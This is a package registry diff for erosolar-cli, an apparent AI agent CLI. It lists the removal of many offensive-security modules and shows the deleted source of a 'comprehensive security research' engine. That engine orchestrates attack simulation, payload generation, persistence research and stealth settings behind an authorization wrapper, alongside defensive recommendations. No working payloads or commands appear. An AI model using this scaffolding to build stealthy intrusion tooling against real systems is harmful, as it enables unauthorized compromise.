erosolar-cli 1.7.55 → 1.7.57

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (273) hide show
  1. package/dist/shell/unifiedInputProcessor.d.ts +15 -12
  2. package/dist/shell/unifiedInputProcessor.d.ts.map +1 -1
  3. package/dist/shell/unifiedInputProcessor.js +45 -72
  4. package/dist/shell/unifiedInputProcessor.js.map +1 -1
  5. package/package.json +4 -4
  6. package/dist/active-stack-security.d.ts +0 -110
  7. package/dist/active-stack-security.js +0 -313
  8. package/dist/active-stack-security.js.map +0 -1
  9. package/dist/advanced-targeting.d.ts +0 -113
  10. package/dist/advanced-targeting.js +0 -252
  11. package/dist/advanced-targeting.js.map +0 -1
  12. package/dist/bin/adapters/node/index.js +0 -33
  13. package/dist/bin/adapters/types.js +0 -1
  14. package/dist/bin/alpha-zero/agentWrapper.js +0 -165
  15. package/dist/bin/alpha-zero/codeEvaluator.js +0 -272
  16. package/dist/bin/alpha-zero/competitiveRunner.js +0 -219
  17. package/dist/bin/alpha-zero/index.js +0 -98
  18. package/dist/bin/alpha-zero/introspection.js +0 -298
  19. package/dist/bin/alpha-zero/metricsTracker.js +0 -207
  20. package/dist/bin/alpha-zero/security/core.js +0 -269
  21. package/dist/bin/alpha-zero/security/google.js +0 -308
  22. package/dist/bin/alpha-zero/security/googleLoader.js +0 -40
  23. package/dist/bin/alpha-zero/security/index.js +0 -31
  24. package/dist/bin/alpha-zero/security/simulation.js +0 -274
  25. package/dist/bin/alpha-zero/selfModification.js +0 -231
  26. package/dist/bin/alpha-zero/types.js +0 -30
  27. package/dist/bin/bin/erosolar-optimized.js +0 -205
  28. package/dist/bin/capabilities/agentSpawningCapability.js +0 -116
  29. package/dist/bin/capabilities/bashCapability.js +0 -22
  30. package/dist/bin/capabilities/cloudCapability.js +0 -36
  31. package/dist/bin/capabilities/codeAnalysisCapability.js +0 -22
  32. package/dist/bin/capabilities/codeQualityCapability.js +0 -23
  33. package/dist/bin/capabilities/dependencySecurityCapability.js +0 -22
  34. package/dist/bin/capabilities/devCapability.js +0 -22
  35. package/dist/bin/capabilities/editCapability.js +0 -28
  36. package/dist/bin/capabilities/emailCapability.js +0 -20
  37. package/dist/bin/capabilities/enhancedGitCapability.js +0 -221
  38. package/dist/bin/capabilities/filesystemCapability.js +0 -22
  39. package/dist/bin/capabilities/globCapability.js +0 -28
  40. package/dist/bin/capabilities/interactionCapability.js +0 -20
  41. package/dist/bin/capabilities/learnCapability.js +0 -22
  42. package/dist/bin/capabilities/mcpCapability.js +0 -20
  43. package/dist/bin/capabilities/notebookCapability.js +0 -28
  44. package/dist/bin/capabilities/planningCapability.js +0 -27
  45. package/dist/bin/capabilities/refactoringCapability.js +0 -23
  46. package/dist/bin/capabilities/repoChecksCapability.js +0 -22
  47. package/dist/bin/capabilities/searchCapability.js +0 -22
  48. package/dist/bin/capabilities/skillCapability.js +0 -76
  49. package/dist/bin/capabilities/taskManagementCapability.js +0 -20
  50. package/dist/bin/capabilities/testingCapability.js +0 -23
  51. package/dist/bin/capabilities/toolManifest.js +0 -159
  52. package/dist/bin/capabilities/toolRegistry.js +0 -114
  53. package/dist/bin/capabilities/webCapability.js +0 -20
  54. package/dist/bin/config.js +0 -139
  55. package/dist/bin/contracts/v1/agent.js +0 -7
  56. package/dist/bin/contracts/v1/agentProfileManifest.js +0 -8
  57. package/dist/bin/contracts/v1/agentRules.js +0 -9
  58. package/dist/bin/contracts/v1/toolAccess.js +0 -8
  59. package/dist/bin/erosolar-optimized.d.ts +0 -12
  60. package/dist/bin/erosolar-optimized.d.ts.map +0 -1
  61. package/dist/bin/erosolar-optimized.js +0 -239
  62. package/dist/bin/erosolar-optimized.js.map +0 -1
  63. package/dist/bin/headless/headlessApp.js +0 -172
  64. package/dist/bin/mcp/config.js +0 -202
  65. package/dist/bin/mcp/stdioClient.js +0 -172
  66. package/dist/bin/mcp/toolBridge.js +0 -104
  67. package/dist/bin/mcp/types.js +0 -1
  68. package/dist/bin/plugins/index.js +0 -113
  69. package/dist/bin/plugins/providers/anthropic/index.js +0 -25
  70. package/dist/bin/plugins/providers/deepseek/index.js +0 -24
  71. package/dist/bin/plugins/providers/google/index.js +0 -26
  72. package/dist/bin/plugins/providers/index.js +0 -19
  73. package/dist/bin/plugins/providers/ollama/index.js +0 -59
  74. package/dist/bin/plugins/providers/openai/index.js +0 -26
  75. package/dist/bin/plugins/providers/xai/index.js +0 -24
  76. package/dist/bin/plugins/tools/agentSpawning/agentSpawningPlugin.js +0 -8
  77. package/dist/bin/plugins/tools/bash/localBashPlugin.js +0 -13
  78. package/dist/bin/plugins/tools/checks/localRepoChecksPlugin.js +0 -13
  79. package/dist/bin/plugins/tools/cloud/cloudPlugin.js +0 -13
  80. package/dist/bin/plugins/tools/codeAnalysis/codeAnalysisPlugin.js +0 -13
  81. package/dist/bin/plugins/tools/codeQuality/codeQualityPlugin.js +0 -13
  82. package/dist/bin/plugins/tools/dependency/dependencyPlugin.js +0 -11
  83. package/dist/bin/plugins/tools/development/devPlugin.js +0 -13
  84. package/dist/bin/plugins/tools/edit/editPlugin.js +0 -14
  85. package/dist/bin/plugins/tools/email/emailPlugin.js +0 -11
  86. package/dist/bin/plugins/tools/enhancedGit/enhancedGitPlugin.js +0 -8
  87. package/dist/bin/plugins/tools/filesystem/localFilesystemPlugin.js +0 -13
  88. package/dist/bin/plugins/tools/glob/globPlugin.js +0 -14
  89. package/dist/bin/plugins/tools/index.js +0 -2
  90. package/dist/bin/plugins/tools/interaction/interactionPlugin.js +0 -11
  91. package/dist/bin/plugins/tools/learn/learnPlugin.js +0 -13
  92. package/dist/bin/plugins/tools/mcp/mcpPlugin.js +0 -8
  93. package/dist/bin/plugins/tools/nodeDefaults.js +0 -56
  94. package/dist/bin/plugins/tools/notebook/notebookPlugin.js +0 -14
  95. package/dist/bin/plugins/tools/planning/planningPlugin.js +0 -14
  96. package/dist/bin/plugins/tools/refactoring/refactoringPlugin.js +0 -11
  97. package/dist/bin/plugins/tools/registry.js +0 -57
  98. package/dist/bin/plugins/tools/search/localSearchPlugin.js +0 -13
  99. package/dist/bin/plugins/tools/skills/skillPlugin.js +0 -8
  100. package/dist/bin/plugins/tools/taskManagement/taskManagementPlugin.js +0 -11
  101. package/dist/bin/plugins/tools/testing/testingPlugin.js +0 -11
  102. package/dist/bin/plugins/tools/web/webPlugin.js +0 -11
  103. package/dist/bin/providers/anthropicProvider.js +0 -329
  104. package/dist/bin/providers/googleProvider.js +0 -203
  105. package/dist/bin/providers/openaiChatCompletionsProvider.js +0 -208
  106. package/dist/bin/providers/openaiResponsesProvider.js +0 -249
  107. package/dist/bin/providers/providerFactory.js +0 -24
  108. package/dist/bin/runtime/agentController.js +0 -321
  109. package/dist/bin/runtime/agentHost.js +0 -153
  110. package/dist/bin/runtime/agentSession.js +0 -195
  111. package/dist/bin/runtime/node.js +0 -10
  112. package/dist/bin/runtime/universal.js +0 -28
  113. package/dist/bin/skills/skillRepository.js +0 -236
  114. package/dist/bin/skills/types.js +0 -1
  115. package/dist/bin/subagents/taskRunner.js +0 -269
  116. package/dist/bin/tools/backgroundBashTools.js +0 -211
  117. package/dist/bin/tools/bashTools.js +0 -159
  118. package/dist/bin/tools/cloudTools.js +0 -864
  119. package/dist/bin/tools/codeAnalysisTools.js +0 -641
  120. package/dist/bin/tools/codeQualityTools.js +0 -294
  121. package/dist/bin/tools/dependencyTools.js +0 -282
  122. package/dist/bin/tools/devTools.js +0 -238
  123. package/dist/bin/tools/diffUtils.js +0 -137
  124. package/dist/bin/tools/editTools.js +0 -134
  125. package/dist/bin/tools/emailTools.js +0 -448
  126. package/dist/bin/tools/fileTools.js +0 -282
  127. package/dist/bin/tools/globTools.js +0 -173
  128. package/dist/bin/tools/grepTools.js +0 -332
  129. package/dist/bin/tools/interactionTools.js +0 -170
  130. package/dist/bin/tools/learnTools.js +0 -1818
  131. package/dist/bin/tools/notebookEditTools.js +0 -196
  132. package/dist/bin/tools/planningTools.js +0 -46
  133. package/dist/bin/tools/refactoringTools.js +0 -293
  134. package/dist/bin/tools/repoChecksTools.js +0 -160
  135. package/dist/bin/tools/searchTools.js +0 -206
  136. package/dist/bin/tools/skillTools.js +0 -177
  137. package/dist/bin/tools/taskManagementTools.js +0 -156
  138. package/dist/bin/tools/testingTools.js +0 -232
  139. package/dist/bin/tools/webTools.js +0 -480
  140. package/dist/bin/workspace.js +0 -106
  141. package/dist/bin/workspace.validator.js +0 -213
  142. package/dist/capabilities/offensiveSecurityCapability.d.ts +0 -26
  143. package/dist/capabilities/offensiveSecurityCapability.d.ts.map +0 -1
  144. package/dist/capabilities/offensiveSecurityCapability.js +0 -58
  145. package/dist/capabilities/offensiveSecurityCapability.js.map +0 -1
  146. package/dist/capabilities/realSecurityCapability.d.ts +0 -26
  147. package/dist/capabilities/realSecurityCapability.d.ts.map +0 -1
  148. package/dist/capabilities/realSecurityCapability.js +0 -53
  149. package/dist/capabilities/realSecurityCapability.js.map +0 -1
  150. package/dist/capabilities/securityCapability.d.ts +0 -32
  151. package/dist/capabilities/securityCapability.d.ts.map +0 -1
  152. package/dist/capabilities/securityCapability.js +0 -57
  153. package/dist/capabilities/securityCapability.js.map +0 -1
  154. package/dist/capabilities/ultimateSecurityCapability.d.ts +0 -42
  155. package/dist/capabilities/ultimateSecurityCapability.d.ts.map +0 -1
  156. package/dist/capabilities/ultimateSecurityCapability.js +0 -96
  157. package/dist/capabilities/ultimateSecurityCapability.js.map +0 -1
  158. package/dist/core/designThoughtCheck.d.ts +0 -196
  159. package/dist/core/designThoughtCheck.d.ts.map +0 -1
  160. package/dist/core/designThoughtCheck.js +0 -287
  161. package/dist/core/designThoughtCheck.js.map +0 -1
  162. package/dist/core/designThoughtCheckEngine.d.ts +0 -58
  163. package/dist/core/designThoughtCheckEngine.d.ts.map +0 -1
  164. package/dist/core/designThoughtCheckEngine.js +0 -358
  165. package/dist/core/designThoughtCheckEngine.js.map +0 -1
  166. package/dist/core/designThoughtCheckIntegration.d.ts +0 -103
  167. package/dist/core/designThoughtCheckIntegration.d.ts.map +0 -1
  168. package/dist/core/designThoughtCheckIntegration.js +0 -207
  169. package/dist/core/designThoughtCheckIntegration.js.map +0 -1
  170. package/dist/core/intelligenceTools.d.ts +0 -19
  171. package/dist/core/intelligenceTools.d.ts.map +0 -1
  172. package/dist/core/intelligenceTools.js +0 -453
  173. package/dist/core/intelligenceTools.js.map +0 -1
  174. package/dist/core/operationalTools.d.ts +0 -19
  175. package/dist/core/operationalTools.d.ts.map +0 -1
  176. package/dist/core/operationalTools.js +0 -467
  177. package/dist/core/operationalTools.js.map +0 -1
  178. package/dist/offensive/core/offensive-engine.d.ts +0 -171
  179. package/dist/offensive/core/offensive-engine.d.ts.map +0 -1
  180. package/dist/offensive/core/offensive-engine.js +0 -345
  181. package/dist/offensive/core/offensive-engine.js.map +0 -1
  182. package/dist/offensive/core/offensive-integration.d.ts +0 -129
  183. package/dist/offensive/core/offensive-integration.d.ts.map +0 -1
  184. package/dist/offensive/core/offensive-integration.js +0 -364
  185. package/dist/offensive/core/offensive-integration.js.map +0 -1
  186. package/dist/offensive/core/offensive-tools.d.ts +0 -55
  187. package/dist/offensive/core/offensive-tools.d.ts.map +0 -1
  188. package/dist/offensive/core/offensive-tools.js +0 -438
  189. package/dist/offensive/core/offensive-tools.js.map +0 -1
  190. package/dist/offensive/offensive-cli.d.ts +0 -48
  191. package/dist/offensive/offensive-cli.d.ts.map +0 -1
  192. package/dist/offensive/offensive-cli.js +0 -233
  193. package/dist/offensive/offensive-cli.js.map +0 -1
  194. package/dist/security/apt-simulation-cli.d.ts +0 -57
  195. package/dist/security/apt-simulation-cli.d.ts.map +0 -1
  196. package/dist/security/apt-simulation-cli.js +0 -278
  197. package/dist/security/apt-simulation-cli.js.map +0 -1
  198. package/dist/security/apt-simulation-engine-complete.d.ts +0 -97
  199. package/dist/security/apt-simulation-engine-complete.d.ts.map +0 -1
  200. package/dist/security/apt-simulation-engine-complete.js +0 -441
  201. package/dist/security/apt-simulation-engine-complete.js.map +0 -1
  202. package/dist/security/apt-simulation-engine.d.ts +0 -97
  203. package/dist/security/apt-simulation-engine.d.ts.map +0 -1
  204. package/dist/security/apt-simulation-engine.js +0 -441
  205. package/dist/security/apt-simulation-engine.js.map +0 -1
  206. package/dist/security/authorization.d.ts +0 -45
  207. package/dist/security/authorization.d.ts.map +0 -1
  208. package/dist/security/authorization.js +0 -128
  209. package/dist/security/authorization.js.map +0 -1
  210. package/dist/security/comprehensive-security-research.d.ts +0 -84
  211. package/dist/security/comprehensive-security-research.d.ts.map +0 -1
  212. package/dist/security/comprehensive-security-research.js +0 -211
  213. package/dist/security/comprehensive-security-research.js.map +0 -1
  214. package/dist/security/offensive/exploitationEngine.d.ts +0 -54
  215. package/dist/security/offensive/exploitationEngine.d.ts.map +0 -1
  216. package/dist/security/offensive/exploitationEngine.js +0 -263
  217. package/dist/security/offensive/exploitationEngine.js.map +0 -1
  218. package/dist/security/real/networkExploitation.d.ts +0 -92
  219. package/dist/security/real/networkExploitation.d.ts.map +0 -1
  220. package/dist/security/real/networkExploitation.js +0 -316
  221. package/dist/security/real/networkExploitation.js.map +0 -1
  222. package/dist/security/real/persistenceImplementation.d.ts +0 -62
  223. package/dist/security/real/persistenceImplementation.d.ts.map +0 -1
  224. package/dist/security/real/persistenceImplementation.js +0 -323
  225. package/dist/security/real/persistenceImplementation.js.map +0 -1
  226. package/dist/security/real/vulnerabilityScanner.d.ts +0 -73
  227. package/dist/security/real/vulnerabilityScanner.d.ts.map +0 -1
  228. package/dist/security/real/vulnerabilityScanner.js +0 -341
  229. package/dist/security/real/vulnerabilityScanner.js.map +0 -1
  230. package/dist/shell/capturePastePatch.d.ts +0 -9
  231. package/dist/shell/capturePastePatch.d.ts.map +0 -1
  232. package/dist/shell/capturePastePatch.js +0 -98
  233. package/dist/shell/capturePastePatch.js.map +0 -1
  234. package/dist/shell/enhancedInteractiveShell.d.ts +0 -90
  235. package/dist/shell/enhancedInteractiveShell.d.ts.map +0 -1
  236. package/dist/shell/enhancedInteractiveShell.js +0 -248
  237. package/dist/shell/enhancedInteractiveShell.js.map +0 -1
  238. package/dist/shell/inputProcessor.d.ts +0 -56
  239. package/dist/shell/inputProcessor.d.ts.map +0 -1
  240. package/dist/shell/inputProcessor.js +0 -172
  241. package/dist/shell/inputProcessor.js.map +0 -1
  242. package/dist/shell/interactiveShell-patch.d.ts +0 -27
  243. package/dist/shell/interactiveShell-patch.d.ts.map +0 -1
  244. package/dist/shell/interactiveShell-patch.js +0 -38
  245. package/dist/shell/interactiveShell-patch.js.map +0 -1
  246. package/dist/shell/interactiveShell-robust.d.ts +0 -26
  247. package/dist/shell/interactiveShell-robust.d.ts.map +0 -1
  248. package/dist/shell/interactiveShell-robust.js +0 -34
  249. package/dist/shell/interactiveShell-robust.js.map +0 -1
  250. package/dist/shell/multiLinePasteManager.d.ts +0 -106
  251. package/dist/shell/multiLinePasteManager.d.ts.map +0 -1
  252. package/dist/shell/multiLinePasteManager.js +0 -308
  253. package/dist/shell/multiLinePasteManager.js.map +0 -1
  254. package/dist/shell/processInputBlockPatch.d.ts +0 -8
  255. package/dist/shell/processInputBlockPatch.d.ts.map +0 -1
  256. package/dist/shell/processInputBlockPatch.js +0 -133
  257. package/dist/shell/processInputBlockPatch.js.map +0 -1
  258. package/dist/tools/enhancedSecurityTools.d.ts +0 -19
  259. package/dist/tools/enhancedSecurityTools.d.ts.map +0 -1
  260. package/dist/tools/enhancedSecurityTools.js +0 -215
  261. package/dist/tools/enhancedSecurityTools.js.map +0 -1
  262. package/dist/tools/offensiveSecurityTools.d.ts +0 -16
  263. package/dist/tools/offensiveSecurityTools.d.ts.map +0 -1
  264. package/dist/tools/offensiveSecurityTools.js +0 -285
  265. package/dist/tools/offensiveSecurityTools.js.map +0 -1
  266. package/dist/tools/realSecurityTools.d.ts +0 -18
  267. package/dist/tools/realSecurityTools.d.ts.map +0 -1
  268. package/dist/tools/realSecurityTools.js +0 -468
  269. package/dist/tools/realSecurityTools.js.map +0 -1
  270. package/dist/tools/securityTools.d.ts +0 -20
  271. package/dist/tools/securityTools.d.ts.map +0 -1
  272. package/dist/tools/securityTools.js +0 -449
  273. package/dist/tools/securityTools.js.map +0 -1
@@ -1,84 +0,0 @@
1
- /**
2
- * Comprehensive Security Research Framework
3
- *
4
- * Unified security research toolkit for authorized penetration testing,
5
- * red team exercises, and security research across enterprise, cloud,
6
- * and infrastructure environments.
7
- *
8
- * This framework integrates:
9
- * - Advanced persistence research
10
- * - Attack simulation capabilities
11
- * - Cloud security testing
12
- * - Network infrastructure analysis
13
- * - Detection evasion research
14
- *
15
- * LEGAL NOTICE:
16
- * For authorized security research, penetration testing, and red team exercises only.
17
- * Requires explicit authorization and scope definition.
18
- */
19
- import { AuthorizationRecord } from '../alpha-zero/security/core.js';
20
- import { AttackCategory } from '../alpha-zero/security/simulation.js';
21
- import { Platform, PersistenceCategory } from './advanced-persistence-research.js';
22
- export interface SecurityResearchScope {
23
- targetDomains: string[];
24
- platforms: Platform[];
25
- categories: PersistenceCategory[];
26
- attackCategories: AttackCategory[];
27
- stealthRequirements: number;
28
- complexityLimit: 'low' | 'medium' | 'high' | 'advanced';
29
- }
30
- export interface SecurityResearchReport {
31
- authorization: AuthorizationRecord;
32
- scope: SecurityResearchScope;
33
- persistenceAnalysis: string;
34
- attackSimulationResults: string;
35
- recommendations: string[];
36
- riskAssessment: string;
37
- generatedAt: string;
38
- }
39
- /**
40
- * Comprehensive Security Research Engine
41
- */
42
- export declare class ComprehensiveSecurityResearchEngine {
43
- private persistenceEngine;
44
- private attackSimulator?;
45
- private authorization;
46
- constructor(authorization: AuthorizationRecord);
47
- /**
48
- * Initialize attack simulation capabilities
49
- */
50
- initializeAttackSimulation(): void;
51
- /**
52
- * Generate comprehensive security research report
53
- */
54
- generateComprehensiveReport(scope: SecurityResearchScope): Promise<SecurityResearchReport>;
55
- /**
56
- * Generate attack simulation report
57
- */
58
- private generateAttackSimulationReport;
59
- /**
60
- * Generate security recommendations
61
- */
62
- private generateRecommendations;
63
- /**
64
- * Generate risk assessment
65
- */
66
- private generateRiskAssessment;
67
- /**
68
- * Export report to file
69
- */
70
- exportReportToFile(report: SecurityResearchReport, filePath: string): Promise<void>;
71
- /**
72
- * Format report for export
73
- */
74
- private formatReportForExport;
75
- }
76
- /**
77
- * Create security research engine with bug bounty authorization
78
- */
79
- export declare function createBugBountyResearchEngine(targetDomain: string, programName: string, scopeLimitations?: string[], outOfScope?: string[]): ComprehensiveSecurityResearchEngine;
80
- /**
81
- * Example usage for security research
82
- */
83
- export declare function runExampleSecurityResearch(): Promise<SecurityResearchReport>;
84
- //# sourceMappingURL=comprehensive-security-research.d.ts.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"comprehensive-security-research.d.ts","sourceRoot":"","sources":["../../src/security/comprehensive-security-research.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;GAiBG;AAEH,OAAO,EAAE,mBAAmB,EAAoD,MAAM,gCAAgC,CAAC;AACvH,OAAO,EAAmB,cAAc,EAAE,MAAM,sCAAsC,CAAC;AACvF,OAAO,EAAqC,QAAQ,EAAE,mBAAmB,EAAE,MAAM,oCAAoC,CAAC;AAEtH,MAAM,WAAW,qBAAqB;IACpC,aAAa,EAAE,MAAM,EAAE,CAAC;IACxB,SAAS,EAAE,QAAQ,EAAE,CAAC;IACtB,UAAU,EAAE,mBAAmB,EAAE,CAAC;IAClC,gBAAgB,EAAE,cAAc,EAAE,CAAC;IACnC,mBAAmB,EAAE,MAAM,CAAC;IAC5B,eAAe,EAAE,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;CACzD;AAED,MAAM,WAAW,sBAAsB;IACrC,aAAa,EAAE,mBAAmB,CAAC;IACnC,KAAK,EAAE,qBAAqB,CAAC;IAC7B,mBAAmB,EAAE,MAAM,CAAC;IAC5B,uBAAuB,EAAE,MAAM,CAAC;IAChC,eAAe,EAAE,MAAM,EAAE,CAAC;IAC1B,cAAc,EAAE,MAAM,CAAC;IACvB,WAAW,EAAE,MAAM,CAAC;CACrB;AAED;;GAEG;AACH,qBAAa,mCAAmC;IAC9C,OAAO,CAAC,iBAAiB,CAAoC;IAC7D,OAAO,CAAC,eAAe,CAAC,CAAkB;IAC1C,OAAO,CAAC,aAAa,CAAsB;gBAE/B,aAAa,EAAE,mBAAmB;IAK9C;;OAEG;IACH,0BAA0B,IAAI,IAAI;IAIlC;;OAEG;IACG,2BAA2B,CAAC,KAAK,EAAE,qBAAqB,GAAG,OAAO,CAAC,sBAAsB,CAAC;IA4BhG;;OAEG;YACW,8BAA8B;IAmC5C;;OAEG;IACH,OAAO,CAAC,uBAAuB;IA0C/B;;OAEG;IACH,OAAO,CAAC,sBAAsB;IA4B9B;;OAEG;IACG,kBAAkB,CAAC,MAAM,EAAE,sBAAsB,EAAE,QAAQ,EAAE,MAAM,GAAG,OAAO,CAAC,IAAI,CAAC;IASzF;;OAEG;IACH,OAAO,CAAC,qBAAqB;CAiC9B;AAED;;GAEG;AACH,wBAAgB,6BAA6B,CAC3C,YAAY,EAAE,MAAM,EACpB,WAAW,EAAE,MAAM,EACnB,gBAAgB,GAAE,MAAM,EAAO,EAC/B,UAAU,GAAE,MAAM,EAAO,GACxB,mCAAmC,CASrC;AAED;;GAEG;AACH,wBAAsB,0BAA0B,oCA6B/C"}
@@ -1,211 +0,0 @@
1
- /**
2
- * Comprehensive Security Research Framework
3
- *
4
- * Unified security research toolkit for authorized penetration testing,
5
- * red team exercises, and security research across enterprise, cloud,
6
- * and infrastructure environments.
7
- *
8
- * This framework integrates:
9
- * - Advanced persistence research
10
- * - Attack simulation capabilities
11
- * - Cloud security testing
12
- * - Network infrastructure analysis
13
- * - Detection evasion research
14
- *
15
- * LEGAL NOTICE:
16
- * For authorized security research, penetration testing, and red team exercises only.
17
- * Requires explicit authorization and scope definition.
18
- */
19
- import { createBugBountyAuthorization } from '../alpha-zero/security/core.js';
20
- import { AttackSimulator, AttackCategory } from '../alpha-zero/security/simulation.js';
21
- import { AdvancedPersistenceResearchEngine, Platform, PersistenceCategory } from './advanced-persistence-research.js';
22
- /**
23
- * Comprehensive Security Research Engine
24
- */
25
- export class ComprehensiveSecurityResearchEngine {
26
- persistenceEngine;
27
- attackSimulator;
28
- authorization;
29
- constructor(authorization) {
30
- this.persistenceEngine = new AdvancedPersistenceResearchEngine();
31
- this.authorization = authorization;
32
- }
33
- /**
34
- * Initialize attack simulation capabilities
35
- */
36
- initializeAttackSimulation() {
37
- this.attackSimulator = new AttackSimulator(this.authorization);
38
- }
39
- /**
40
- * Generate comprehensive security research report
41
- */
42
- async generateComprehensiveReport(scope) {
43
- const report = {
44
- authorization: this.authorization,
45
- scope,
46
- persistenceAnalysis: '',
47
- attackSimulationResults: '',
48
- recommendations: [],
49
- riskAssessment: '',
50
- generatedAt: new Date().toISOString()
51
- };
52
- // Generate persistence analysis
53
- report.persistenceAnalysis = this.persistenceEngine.generateResearchReport(scope.platforms);
54
- // Generate attack simulation results if simulator is available
55
- if (this.attackSimulator) {
56
- report.attackSimulationResults = await this.generateAttackSimulationReport(scope);
57
- }
58
- // Generate recommendations
59
- report.recommendations = this.generateRecommendations(scope);
60
- // Generate risk assessment
61
- report.riskAssessment = this.generateRiskAssessment(scope);
62
- return report;
63
- }
64
- /**
65
- * Generate attack simulation report
66
- */
67
- async generateAttackSimulationReport(scope) {
68
- if (!this.attackSimulator)
69
- return 'Attack simulation not initialized';
70
- const results = [];
71
- results.push('ATTACK SIMULATION RESULTS');
72
- results.push('='.repeat(60));
73
- // Simulate attacks based on scope
74
- for (const category of scope.attackCategories) {
75
- const vectors = this.attackSimulator.getVectorsByCategory(category);
76
- if (vectors.length > 0) {
77
- results.push(`\n## ${category.toUpperCase()} ATTACKS`);
78
- for (const vector of vectors.slice(0, 3)) { // Limit to top 3 per category
79
- results.push(`\n### ${vector.name}`);
80
- results.push(`- **Description**: ${vector.description}`);
81
- results.push(`- **Stealth**: ${vector.stealthRating}/5`);
82
- results.push(`- **Complexity**: ${vector.complexity}`);
83
- // Generate payloads for demonstration
84
- const payloads = this.attackSimulator.generatePayloads(vector.id);
85
- if (payloads.length > 0) {
86
- results.push('\nSample Payloads:');
87
- payloads.slice(0, 2).forEach(payload => {
88
- results.push(` - ${payload}`);
89
- });
90
- }
91
- }
92
- }
93
- }
94
- return results.join('\n');
95
- }
96
- /**
97
- * Generate security recommendations
98
- */
99
- generateRecommendations(scope) {
100
- const recommendations = [];
101
- // Platform-specific recommendations
102
- if (scope.platforms.includes(Platform.WINDOWS)) {
103
- recommendations.push('Implement Credential Guard and LSA protection for Windows environments', 'Regularly rotate krbtgt account password (twice) to prevent Golden Ticket attacks', 'Monitor for ACL modifications on sensitive domain objects', 'Use Microsoft ATA or Azure Sentinel for advanced threat detection');
104
- }
105
- if (scope.platforms.includes(Platform.AWS) || scope.platforms.includes(Platform.AZURE) || scope.platforms.includes(Platform.GCP)) {
106
- recommendations.push('Implement least privilege for cloud IAM roles and service accounts', 'Monitor cloud audit logs for suspicious activity', 'Disable service account key creation where possible', 'Use cloud security posture management tools');
107
- }
108
- if (scope.platforms.includes(Platform.KUBERNETES) || scope.platforms.includes(Platform.DOCKER)) {
109
- recommendations.push('Implement Pod Security Standards for Kubernetes', 'Use admission controllers (OPA Gatekeeper) for policy enforcement', 'Scan container images for vulnerabilities', 'Monitor for privileged container deployments');
110
- }
111
- // General recommendations
112
- recommendations.push('Implement comprehensive logging and monitoring', 'Conduct regular security assessments and penetration tests', 'Establish incident response procedures', 'Provide security awareness training');
113
- return recommendations;
114
- }
115
- /**
116
- * Generate risk assessment
117
- */
118
- generateRiskAssessment(scope) {
119
- const risks = [];
120
- let overallRisk = 'LOW';
121
- // Assess risk based on scope
122
- if (scope.platforms.includes(Platform.WINDOWS)) {
123
- risks.push('Active Directory environments are high-value targets for persistence');
124
- overallRisk = 'HIGH';
125
- }
126
- if (scope.platforms.includes(Platform.AWS) || scope.platforms.includes(Platform.AZURE) || scope.platforms.includes(Platform.GCP)) {
127
- risks.push('Cloud misconfigurations can lead to widespread compromise');
128
- overallRisk = overallRisk === 'LOW' ? 'MEDIUM' : overallRisk;
129
- }
130
- if (scope.platforms.includes(Platform.KUBERNETES)) {
131
- risks.push('Container orchestration platforms provide extensive attack surface');
132
- overallRisk = overallRisk === 'LOW' ? 'MEDIUM' : overallRisk;
133
- }
134
- if (scope.stealthRequirements >= 4) {
135
- risks.push('High stealth requirements indicate advanced threat actor capabilities');
136
- overallRisk = 'HIGH';
137
- }
138
- return `Overall Risk: ${overallRisk}\n\nKey Risk Factors:\n${risks.map(risk => `- ${risk}`).join('\n')}`;
139
- }
140
- /**
141
- * Export report to file
142
- */
143
- async exportReportToFile(report, filePath) {
144
- const reportContent = this.formatReportForExport(report);
145
- // In a real implementation, this would write to file
146
- // For now, we'll just log it
147
- console.log(`Report would be exported to: ${filePath}`);
148
- console.log(reportContent);
149
- }
150
- /**
151
- * Format report for export
152
- */
153
- formatReportForExport(report) {
154
- const lines = [];
155
- lines.push('COMPREHENSIVE SECURITY RESEARCH REPORT');
156
- lines.push('='.repeat(80));
157
- lines.push(`Generated: ${report.generatedAt}`);
158
- lines.push(`Authorization: ${report.authorization.authorizedBy}`);
159
- lines.push(`Scope: ${report.authorization.scope}`);
160
- lines.push('');
161
- lines.push('1. PERSISTENCE ANALYSIS');
162
- lines.push('-'.repeat(40));
163
- lines.push(report.persistenceAnalysis);
164
- lines.push('');
165
- lines.push('2. ATTACK SIMULATION RESULTS');
166
- lines.push('-'.repeat(40));
167
- lines.push(report.attackSimulationResults);
168
- lines.push('');
169
- lines.push('3. SECURITY RECOMMENDATIONS');
170
- lines.push('-'.repeat(40));
171
- report.recommendations.forEach((rec, index) => {
172
- lines.push(`${index + 1}. ${rec}`);
173
- });
174
- lines.push('');
175
- lines.push('4. RISK ASSESSMENT');
176
- lines.push('-'.repeat(40));
177
- lines.push(report.riskAssessment);
178
- return lines.join('\n');
179
- }
180
- }
181
- /**
182
- * Create security research engine with bug bounty authorization
183
- */
184
- export function createBugBountyResearchEngine(targetDomain, programName, scopeLimitations = [], outOfScope = []) {
185
- const authorization = createBugBountyAuthorization(targetDomain, programName, scopeLimitations, outOfScope);
186
- return new ComprehensiveSecurityResearchEngine(authorization);
187
- }
188
- /**
189
- * Example usage for security research
190
- */
191
- export async function runExampleSecurityResearch() {
192
- // Create research engine with bug bounty authorization
193
- const researchEngine = createBugBountyResearchEngine('example.com', 'Example Bug Bounty Program', ['Production systems only', 'No destructive testing'], ['Staging environments', 'Third-party services']);
194
- // Initialize attack simulation
195
- researchEngine.initializeAttackSimulation();
196
- // Define research scope
197
- const scope = {
198
- targetDomains: ['example.com'],
199
- platforms: [Platform.WINDOWS, Platform.AWS, Platform.KUBERNETES],
200
- categories: [PersistenceCategory.ENTERPRISE, PersistenceCategory.CLOUD, PersistenceCategory.CONTAINER],
201
- attackCategories: [AttackCategory.WEB_APPLICATION, AttackCategory.AUTHENTICATION, AttackCategory.INJECTION],
202
- stealthRequirements: 4,
203
- complexityLimit: 'high'
204
- };
205
- // Generate comprehensive report
206
- const report = await researchEngine.generateComprehensiveReport(scope);
207
- // Export report
208
- await researchEngine.exportReportToFile(report, './security-research-report.txt');
209
- return report;
210
- }
211
- //# sourceMappingURL=comprehensive-security-research.js.map
@@ -1 +0,0 @@
1
